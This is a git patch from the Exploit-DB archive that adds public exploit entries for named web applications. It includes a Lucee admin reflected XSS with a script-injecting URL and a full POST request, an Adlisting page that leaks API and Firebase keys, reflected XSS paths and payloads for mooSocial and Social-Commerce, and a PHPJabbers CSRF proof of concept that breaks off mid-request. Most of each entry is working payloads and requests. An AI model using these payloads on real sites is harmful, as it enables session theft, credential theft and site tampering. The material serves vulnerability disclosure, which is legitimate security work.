From 69f3ee7722635417f30d40dab5b75bdb983d36be Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 9 Aug 2023 00:16:24 +0000 Subject: [PATCH] DB: 2023-08-09 8 changes to exploits/shellcodes/ghdb Lucee 5.4.2.17 - Authenticated Reflected XSS Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure Emagic Data Center Management Suite v6.0 - OS Command Injection mooSocial 3.1.8 - Reflected XSS PHPJabbers Vacation Rental Script 4.0 - CSRF Social-Commerce 3.1.6 - Reflected XSS Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated) --- exploits/multiple/webapps/51668.txt | 39 +++++++++++++++ exploits/php/webapps/51667.txt | 49 +++++++++++++++++++ exploits/php/webapps/51670.txt | 38 +++++++++++++++ exploits/php/webapps/51671.txt | 51 ++++++++++++++++++++ exploits/php/webapps/51672.txt | 32 ++++++++++++ exploits/php/webapps/51673.sh | 49 +++++++++++++++++++ exploits/python/webapps/51669.txt | 75 +++++++++++++++++++++++++++++ files_exploits.csv | 7 +++ 8 files changed, 340 insertions(+) create mode 100644 exploits/multiple/webapps/51668.txt create mode 100644 exploits/php/webapps/51667.txt create mode 100644 exploits/php/webapps/51670.txt create mode 100644 exploits/php/webapps/51671.txt create mode 100644 exploits/php/webapps/51672.txt create mode 100755 exploits/php/webapps/51673.sh create mode 100644 exploits/python/webapps/51669.txt diff --git a/exploits/multiple/webapps/51668.txt b/exploits/multiple/webapps/51668.txt new file mode 100644 index 000000000..ed649f926 --- /dev/null +++ b/exploits/multiple/webapps/51668.txt @@ -0,0 +1,39 @@ +# Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS +# Google Dork: NA +# Date: 05/08/2023 +# Exploit Author: Yehia Elghaly +# Vendor Homepage: https://www.lucee.org/ +# Software Link: https://download.lucee.org/ +# Version: << 5.4.2.17 +# Tested on: Windows 10 +# CVE: N/A + + +Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java. + +Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + +The payload: ?msg= +http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E + +POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1 +Host: 172.16.110.130:8888 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +Origin: http://172.16.110.130:8888 +Connection: close +Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create +Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview +Upgrade-Insecure-Requests: 1 + +name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit + +[Affected Component] +Debugging-->Template +Service --> Search +Services --> Event Gateway +Service --> Logging \ No newline at end of file diff --git a/exploits/php/webapps/51667.txt b/exploits/php/webapps/51667.txt new file mode 100644 index 000000000..bb3c800d3 --- /dev/null +++ b/exploits/php/webapps/51667.txt @@ -0,0 +1,49 @@ +# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure +# Exploit Author: CraCkEr +# Date: 25/07/2023 +# Vendor: Templatecookie +# Vendor Homepage: https://templatecookie.com/ +# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script +# Version: 2.14.0 +# Tested on: Windows 10 Pro +# Impact: Sensitive Information Leakage +# CVE: CVE-2023-4168 + + +## Description + +Information disclosure issue in the redirect responses, When accessing any page on the website, +Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. + + +## Steps to Reproduce: + +When you visit any page on the website, like: + +https://website/ad-list?category=electronics +https://website/ad-list-search?page=2 +https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword= + +in the body page response there's information leakage for + ++---------------------+ +google_map_key +api_key +auth_domain +project_id +storage_bucket +messaging_sender_id +app_id +measurement_id ++---------------------+ + + +Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel. + +Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path: + +https://website/push-notification (Login as Administrator) + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51670.txt b/exploits/php/webapps/51670.txt new file mode 100644 index 000000000..3ff76f3cf --- /dev/null +++ b/exploits/php/webapps/51670.txt @@ -0,0 +1,38 @@ +# Exploit Title: mooSocial 3.1.8 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 28/07/2023 +# Vendor: mooSocial +# Vendor Homepage: https://moosocial.com/ +# Software Link: https://travel.moosocial.com/ +# Version: 3.1.8 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site +# CVE: CVE-2023-4173 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + + +URL path folder is vulnerable to XSS + +https://website/classifieds[XSS]/search?category=1 + +https://website/classifieds/search[XSS]?category=1 + + +XSS Payloads: + +ijz3y">y4apk + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51671.txt b/exploits/php/webapps/51671.txt new file mode 100644 index 000000000..03cc4db52 --- /dev/null +++ b/exploits/php/webapps/51671.txt @@ -0,0 +1,51 @@ +# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 28/07/2023 +# Vendor: mooSocial +# Vendor Homepage: https://moosocial.com/ +# Software Link: https://social-commerce.moosocial.com/ +# Version: 3.1.6 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site +# CVE: CVE-2023-4174 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +Path: /search/index + +GET parameter 'q' is vulnerable to XSS + +https://website/search/index?q=[XSS] + + +URL path folder [1,2] is vulnerable to XSS + +https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent + +https://website/user_info[XSS]/index/friends + +https://website/user_info/index[XSS]/friends + +https://website/faqs[XSS]/index?content_search= + +https://website/faqs/index[XSS]?content_search= + + + +XSS Payloads: + +j8chn">ridxm + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51672.txt b/exploits/php/webapps/51672.txt new file mode 100644 index 000000000..4ec721031 --- /dev/null +++ b/exploits/php/webapps/51672.txt @@ -0,0 +1,32 @@ +# Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF +# Date: 05/08/2023 +# Exploit Author: Hasan Ali YILDIR +# Vendor Homepage: https://www.phpjabbers.com/ +# Software Link: https://www.phpjabbers.com/vacation-rental-script/ +# Version: 4.0 +# Tested on: Windows 10 Pro + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +Technical Detail / POC + +========================== + +1. Login Account +2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) +3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21) + + +[1] Cross-Site Request Forgery + +Request: +https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="